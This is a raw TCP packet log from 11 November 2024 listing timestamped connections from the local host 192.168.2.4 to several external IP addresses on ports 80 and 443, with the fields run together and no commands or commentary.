                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950186968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950191021 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950201035 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950205088 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950217009 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950220108 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950228930 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950239897 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950251102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950251102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950258017 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950272083 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.950293064 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977206945 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977229118 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977241039 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977267981 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977303028 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977384090 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977395058 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977404118 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977415085 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977427006 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977428913 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977443933 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977454901 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977459908 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977472067 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977483988 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977484941 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977499008 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977504015 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977516890 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977528095 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977529049 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977539062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977550030 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977560043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977566004 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977583885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.977595091 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.987685919 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.987822056 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:23.448895931 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:23.453948021 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:24.383596897 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:24.383668900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:28.524162054 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:28.525660992 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:53.675975084 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:53.676016092 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:53.676107883 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:53.676637888 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:53.676655054 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.390640020 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.390769005 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.396565914 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.396586895 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.396780014 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.408058882 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.455331087 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644717932 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644737005 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644766092 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644886971 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644917011 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644937038 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.644963980 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.646841049 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.646867037 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.646910906 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.646919012 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.646944046 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666404963 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666423082 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666440010 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666553974 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666587114 CET4434976352.149.20.212192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:54.666627884 CET49763443192.168.2.452.149.20.212
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:55.819638968 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:55.819674969 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:55.819755077 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:55.820097923 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:55.820108891 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.368709087 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.368835926 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.370708942 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.370718956 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.370918989 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.381264925 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.423331022 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533003092 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533023119 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533035994 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533128977 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533144951 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.533212900 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.553971052 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.553985119 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.554044962 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.554052114 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.554131985 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.614304066 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.614317894 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.614403009 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.614413023 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.614458084 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.634337902 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.634351969 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.634432077 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.634438992 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.634480000 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.636636972 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.636650085 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.636718988 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.636724949 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.636774063 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.638410091 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.638422966 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.638482094 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.638485909 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.638528109 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.695842028 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.695856094 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.695960999 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.695969105 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.696012020 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.714962006 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.714978933 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715131044 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715154886 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715200901 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715909004 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715924978 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715986013 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.715991974 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716034889 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716783047 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716801882 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716846943 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716852903 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716881990 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.716893911 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.717658997 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.717674971 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.717736006 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.717741013 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.717783928 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.719429016 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.719444036 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.719501019 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.719506025 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.719547033 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.720357895 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.720379114 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.720431089 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.720436096 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.720479012 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776125908 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776185989 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776230097 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776259899 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776396990 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776408911 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776421070 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.776427031 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830077887 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830106974 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830200911 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830780029 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830817938 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.830881119 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.831842899 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.831850052 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.831904888 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.832990885 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.832997084 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.833339930 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.833353043 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.840432882 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.840447903 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842255116 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842300892 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842371941 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842464924 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842495918 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842569113 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842596054 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842612982 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842746019 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:56.842758894 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351072073 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351279974 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351787090 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351814985 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351815939 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.351829052 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352374077 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352379084 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352443933 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352545977 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352555990 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352730036 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.352736950 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.353229046 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.353233099 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355077028 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355247974 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355413914 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355432034 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355580091 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355598927 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355922937 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355927944 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355989933 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.355993986 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444011927 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444293976 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444364071 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444461107 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444474936 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444484949 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444489002 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444602013 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444622040 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444699049 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444706917 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444753885 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444895029 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444895029 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444900036 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444943905 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.444984913 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445019007 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445765972 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445784092 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445857048 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445863008 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445944071 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.445966959 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446002007 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446003914 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446012974 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446042061 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446050882 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446079016 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.446083069 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.447840929 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448136091 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448211908 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448290110 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448306084 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448343039 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448364973 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448391914 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448554993 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448566914 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448580027 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448584080 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448906898 CET49770443192.168.2.413.107.246.45
